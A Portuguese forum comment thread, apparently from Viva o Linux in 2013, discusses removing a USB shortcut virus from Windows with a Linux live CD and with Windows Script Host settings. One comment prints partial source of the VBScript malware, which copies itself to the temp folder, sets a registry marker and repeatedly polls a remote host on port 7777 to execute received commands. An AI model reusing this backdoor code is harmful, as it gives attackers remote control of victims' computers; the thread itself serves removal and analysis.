[1] Comentário enviado por ktec em 16/10/2013 - 08:25h:

Ola , esse último arquivo o W.VBS não esta sendo encontrado dentro do meu HD Externo , onde está o virus , ja fiz o passo anterior de remover o wind.32 . E agora o que fazer?

[2] Comentário enviado por welingtoninfo em 16/10/2013 - 11:31h:

Fiz um vídeo ensinando como reparar os atalhos, mas não consegui até hoje pelo Windows remover o maldito vírus. Vou tentar desse modo.

http://www.youtube.com/watch?v=mVCDcKvX2M4

Meu canal: www.youtube.com/welingtoninfo

[7] Comentário enviado por ianclever em 16/10/2013 - 20:06h:

Olha eu tinha optado por não liberar informações sobre como remover esse vírus, mas já que criou um artigo, tenho uma forma melhor de solucionar isso:

o nome desse vírus é Hanza.vbs, e sim é um VBscript, no caso o que vc fez é remover o interpretador de scripts do windows, o que pode prejudicar caso algum programa precise, o vírus Hanza.vbs, se aloja nessas pastas no windows(testado no 7):

C:/Users/"Usuario"/AppData/Local/Temp

e

C:/Users/"Usuário"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup

removendo desses 2 lugares ele para de infectar pendrives, para liberar o pendrive desse vírus, basta acessar seu pendrive pelo GNU/Linux nas versões meis recentes acho que é:

#cd /media/"usuário"/nome_do_pendrive/

rm -rf *.vbs
rm -rf *.lnk
rm -rf *.ini
rm -rf *.inf
por desencargo de consiência tire agora o que ficou no pedrive, formate e volte os dados para lá.

[5] Comentário enviado por tonyfrasouza em 16/10/2013 - 19:32h:

Os nomes podem mudar: Pasta b9b9b e aquivos 1ab7.js que estarão ocultos na pasta de usuário, arquivos de programs e C:
No meu caso todos arquivos "vírus" tinha extensão .js que roda no Wscript.exe.
Penso que o que o .vbs é o VBscript.exe.
Realmente está mais chato de tirar essas encrenca. Ela evoluiu um pouco. No ano passado tinha muitos infectados com algo do tipo mas era bem mais simples ficar livre.

[7] Comentário enviado por ianclever em 16/10/2013 - 20:06h:

Olha eu tinha optado por não liberar informações sobre como remover esse vírus, mas já que criou um artigo, tenho uma forma melhor de solucionar isso:

o nome desse vírus é Hanza.vbs, e sim é um VBscript, no caso o que vc fez é remover o interpretador de scripts do windows, o que pode prejudicar caso algum programa precise, o vírus Hanza.vbs, se aloja nessas pastas no windows(testado no 7):

C:/Users/"Usuario"/AppData/Local/Temp

e

C:/Users/"Usuário"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup

removendo desses 2 lugares ele para de infectar pendrives, para liberar o pendrive desse vírus, basta acessar seu pendrive pelo GNU/Linux nas versões meis recentes acho que é:

#cd /media/"usuário"/nome_do_pendrive/

rm -rf *.vbs
rm -rf *.lnk
rm -rf *.ini
rm -rf *.inf
por desencargo de consiência tire agora o que ficou no pedrive, formate e volte os dados para lá.

[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

[17] Comentário enviado por Nilodanx52 em 20/10/2013 - 01:37h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Tentou usar o Dr Web? Uso nos windows daqui da casa funciona bem melhor. Além de ser de tecnologia russa. rsrsrsrs

[19] Comentário enviado por thyagobrasileiro em 21/10/2013 - 04:01h:

No meu caso, o nome do arquivo malicioso era servica.vbs, e em vez de exclui-lo no linux eu usei um comando para analisar o que ele fazia, mas antes de mostrar o resultado, o objetivo desse virus não é apenas de ocultar seus arquivos, isto é apenas uma distração. segue o codigo gerado pelo seguinte comando:


#strings servica.vbs


On Error Resume Next
dim sh ' shell
set sh =WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs= CreateObject("Scripting.FileSystemObject")
dim host
host="jn.redirectme.net"
dim port
port= 7777
dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
dim FN
FN ="Servieca.vbs"
dim fh
dim us
us="~"
ins
dim spl
spl="jnJnj"
dim i
i=0
while true
dim a
a= split(post("ready",""),spl)
select case a(0)
case "exc"
dim sa
sa= a(1)
execute sa
case "uns"
uns
end select
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend

function ins
on error resume next
us= sh.regread("HKCU\njq8")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
us="y"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
else
us="n"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function

[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

[24] Comentário enviado por jwolff em 21/10/2013 - 13:59h:


[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

Porque aqui é o Viva o Linux e não o Viva o Windows cara D: Pouco intuitivo porque eu usei este método porque ele "força" o usuário a testar o Ubuntu, usar o LILI, interagir com as interfaces... Digamos que o artigo é "for dummies", se alguém que leu não se encaixa neste grupo, a escolha é própria, a leitura é facultativa, e a opinião ou critica é desnecessária. Não to falando especificamente do teu comentário, mas tem uma galera falando outras formas de remover(dentro do Windows), que o vírus não é isso que é aquilo. Eu não to nem ai! Só mostrei uma forma PROPOSITAL com o Linux, porque eu quero mostrar as vantagens do Linux, pra quem ainda é preso ao Windows. Estritamente isto. Tem muita gente que nem leu o que eu escrevi, e já vai metendo pau, numa tentativa desnecessária de demonstrar conhecimento. Se querem falar isso ou aquilo, cria um artigo próprio e seja feliz. O meu objetivo já foi atingido. Muito Obrigado.

[25] Comentário enviado por spish em 21/10/2013 - 14:53h:


[24] Comentário enviado por jwolff em 21/10/2013 - 13:59h:


[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

Porque aqui é o Viva o Linux e não o Viva o Windows cara D: Pouco intuitivo porque eu usei este método porque ele "força" o usuário a testar o Ubuntu, usar o LILI, interagir com as interfaces... Digamos que o artigo é "for dummies", se alguém que leu não se encaixa neste grupo, a escolha é própria, a leitura é facultativa, e a opinião ou critica é desnecessária. Não to falando especificamente do teu comentário, mas tem uma galera falando outras formas de remover(dentro do Windows), que o vírus não é isso que é aquilo. Eu não to nem ai! Só mostrei uma forma PROPOSITAL com o Linux, porque eu quero mostrar as vantagens do Linux, pra quem ainda é preso ao Windows. Estritamente isto. Tem muita gente que nem leu o que eu escrevi, e já vai metendo pau, numa tentativa desnecessária de demonstrar conhecimento. Se querem falar isso ou aquilo, cria um artigo próprio e seja feliz. O meu objetivo já foi atingido. Muito Obrigado.

Bacana de sua parte o feedback. Entendi agora. Parabéns pelo artigo. Mais uma vez não meti o pau ;) li todo o artigo se fosse para falar alguma coisa para te magoar nem teria colocado. Aliás nem teria lido, mas gostei tanto que resolvi comentar. Algo que não faço com muita frequência por aqui. Nota 10!!! Valeu.

[26] Comentário enviado por jwolff em 21/10/2013 - 15:01h:


[25] Comentário enviado por spish em 21/10/2013 - 14:53h:


[24] Comentário enviado por jwolff em 21/10/2013 - 13:59h:


[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

Porque aqui é o Viva o Linux e não o Viva o Windows cara D: Pouco intuitivo porque eu usei este método porque ele "força" o usuário a testar o Ubuntu, usar o LILI, interagir com as interfaces... Digamos que o artigo é "for dummies", se alguém que leu não se encaixa neste grupo, a escolha é própria, a leitura é facultativa, e a opinião ou critica é desnecessária. Não to falando especificamente do teu comentário, mas tem uma galera falando outras formas de remover(dentro do Windows), que o vírus não é isso que é aquilo. Eu não to nem ai! Só mostrei uma forma PROPOSITAL com o Linux, porque eu quero mostrar as vantagens do Linux, pra quem ainda é preso ao Windows. Estritamente isto. Tem muita gente que nem leu o que eu escrevi, e já vai metendo pau, numa tentativa desnecessária de demonstrar conhecimento. Se querem falar isso ou aquilo, cria um artigo próprio e seja feliz. O meu objetivo já foi atingido. Muito Obrigado.

Bacana de sua parte o feedback. Entendi agora. Parabéns pelo artigo. Mais uma vez não meti o pau ;) li todo o artigo se fosse para falar alguma coisa para te magoar nem teria colocado. Aliás nem teria lido, mas gostei tanto que resolvi comentar. Algo que não faço com muita frequência por aqui. Nota 10!!! Valeu.



Não magoou, espero que você também não.
Então ficou tudo certo meu amigo :D Paz de Jah! Valeu.

[31] Comentário enviado por NilPassos em 26/10/2013 - 03:52h:

Muito bom artigo.
Já uso o linux para fazer manutenção nos pc's de clientes e principalmente para a remoção de virus.
Tem outros malditos por aí, tais como o Sality, alguns worms e este script, que só saem na marra.
Eu consegui um meio de tirar estes virus pelo próprio Ruindow$, mas o que vale é mostrar como o sistema microsoft é frágil e como o Linux tem se mostrado a melhor opção em segurança na internet atualmente.
Parabéns.
Eu mesmo já havia pensado em publicar algo do gênero, mas deixei passar.Pois aqui é direcionado a usuários de linux, então achei desnecessário.
Caso alguns leitores desconheçam, as ferramentas de manutenção e estruturação de sistemas oeracionais em sua maioria são baseados e ou construídos em cima de um sistema Linux ou Unix.
Podemos citar alguns exemplos:
Nero ( cd de instalação e backup vem com isolinux para o "backitup")
Sm player, Klite codec pack, Autodesk, Vlc, Firefox, Songbird, Xoops, Realplayer( antes chamado de Helixplayer no Linux, se prostituiu depois disso e passou a ser produzido em melhores funções e gráficos para Windows), Java ( que é uma linguagem criada com base Unix).
Tem a menina dos olhos do Linux, nosso querido super servidor Apache, quem não conhece?
O Firebird e a melhor linguagem de programação que existe : Python.
Tudo isso vem do Linux e depois e compilado para executar em Ms.
Então vale salientar aqui que o que você apresentou aqui é muito bom. Mostrar que nosso sistema além de ser um ótimo servidor, um bom desktop é também uma maravilhosa ferramenta para os técnicos de informática...
Até mais.

[33] Comentário enviado por joaoabi em 11/11/2013 - 14:06h:

Muito legal sua dica brother,
Fiz uns testes com alguns pendrivers infectados aqui no serviço e realmente, funciona.

Parabéns.

Att. Joao Abi Saber